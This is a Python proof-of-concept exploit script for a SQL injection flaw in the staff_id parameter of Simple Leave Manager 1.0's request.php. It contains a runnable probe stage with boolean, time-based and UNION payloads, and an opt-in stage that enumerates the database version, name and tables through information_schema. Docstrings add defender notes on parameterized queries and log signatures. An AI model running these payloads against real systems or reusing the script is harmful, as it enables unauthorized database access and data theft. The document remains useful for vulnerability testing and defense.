#!/usr/bin/env python3
"""
CVE-2025-14223 PoC - Simple Leave Manager 1.0 SQL Injection
Target: /request.php staff_id parameter
CVSS: 7.3 (High)
"""
import requests
import sys
from urllib.parse import urlencode
def test_sql_injection(base_url):
    """Test for SQL injection vulnerability in staff_id parameter.

    POSTs a fixed list of probe values in the ``staff_id`` form field to
    ``<base_url>/request.php`` and prints, for each one, the HTTP status,
    the response length and whether the body contains "sql"/"mysql".
    Nothing is returned; the operator reads the output and judges.

    Defender notes:
      - Root cause of the CVE on the page header: ``staff_id`` reaching an SQL
        statement unparameterized.  A prepared statement (bound parameter)
        in request.php neutralises every value below; input filtering alone
        does not.
      - Detection: in web/application logs the probes show up as a quote
        followed by ``OR``/``AND``/``UNION SELECT``/``SLEEP(`` inside the
        ``staff_id`` POST field.  A 5-second stall on request.php is the
        time-based variant.

    Args:
        base_url: scheme and host of the target with no trailing slash
            (the ``__main__`` block strips it).
    """
    # Target endpoint
    target = f"{base_url}/request.php"
    # Payload: Boolean-based blind SQL injection
    # Original: staff_id=1
    # Injected: staff_id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -
    payloads = [
        # Basic injection test
        {"staff_id": "1' OR '1'='1"},
        # Boolean-based blind injection
        {"staff_id": "1' AND 1=1--"},
        {"staff_id": "1' AND 1=2--"},
        # Time-based blind injection
        {"staff_id": "1' AND SLEEP(5)--"},
        # Union-based injection to extract database version
        {"staff_id": "1' UNION SELECT NULL,@@version,NULL--"},
    ]
    print(f"[*] Testing {target}")
    print(f"[*] Vulnerability: SQL Injection in staff_id parameter")
    print("-" * 60)
    for i, payload in enumerate(payloads, 1):
        print(f"\n[Test {i}] Payload: {payload['staff_id']}")
        try:
            # Sent as a form-encoded POST body; timeout=10 bounds each probe,
            # and verify=False disables TLS certificate checking, so any
            # certificate (including an interposed one) is accepted.
            response = requests.post(
                target,
                data=payload,
                timeout=10,
                verify=False
            )
            # Every probe, including the SLEEP(5) one, is reported only by
            # status and length; elapsed time is not measured here.
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")
            # Check for SQL error indicators
            # Substring match over the whole body: a page that merely mentions
            # MySQL (footer, help text) trips it, and a sanitised error page
            # does not.  Treat as a hint, not a verdict.
            if "sql" in response.text.lower() or "mysql" in response.text.lower():
                print("[!] Potential SQL error detected!")
        except requests.exceptions.RequestException as e:
            # Connection errors and timeouts are reported and the loop
            # continues with the next probe.
            print(f"[-] Request failed: {e}")
    print("\n" + "-" * 60)
    print("[*] Testing complete")
def extract_data(base_url):
    """Extract data using UNION-based SQL injection.

    POSTs each payload in ``extraction_payloads`` as the ``staff_id`` form
    field and prints only the response length on HTTP 200.  As the in-line
    note says, the body is never parsed, so this function does not actually
    return or display any extracted value.

    Defender notes:
      - The ``information_schema.tables`` queries are the clearest log
        signature of this stage; ``version()``/``database()`` in a form
        field are likewise never legitimate input.
      - The same fix applies as for the probe stage: bind ``staff_id`` as a
        query parameter in request.php.  Running the application's database
        account with the minimum privileges it needs limits what a UNION
        can reach if a query is missed.

    Args:
        base_url: scheme and host of the target with no trailing slash.
    """
    target = f"{base_url}/request.php"
    # Data extraction payloads
    extraction_payloads = {
        "database_version": "1' UNION SELECT NULL,version(),NULL,NULL--",
        "database_name": "1' UNION SELECT NULL,database(),NULL,NULL--",
        "table_names": "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema=database()--",
        "user_table": "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_name LIKE '%user%'--"
    }
    print("\n[*] Attempting data extraction...")
    for name, payload in extraction_payloads.items():
        print(f"\n[*] Extracting: {name}")
        print(f"[*] Payload: {payload}")
        try:
            # Same transport settings as the probe stage: 10 s timeout,
            # TLS certificate verification disabled.
            response = requests.post(
                target,
                data={"staff_id": payload},
                timeout=10,
                verify=False
            )
            if response.status_code == 200:
                # Only the length is reported; a 200 with any length does not
                # by itself show that the UNION succeeded.
                print(f"[+] Response received (length: {len(response.text)})")
                # Parse and display relevant data
                # Note: Actual implementation would parse HTML response
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
if __name__ == "__main__":
    # Entry point: exactly one positional argument, the base URL of the
    # target.  No validation of the scheme or host is done here.
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        print(f"Example: python3 {sys.argv[0]} http://target.com")
        sys.exit(1)
    # Strip a trailing slash so the f-string path join in both functions
    # does not produce "//request.php".
    base_url = sys.argv[1].rstrip('/')
    # Only the probe stage runs by default; the extraction stage stays
    # opt-in via the commented call below.
    test_sql_injection(base_url)
    # Uncomment to attempt data extraction
    # extract_data(base_url)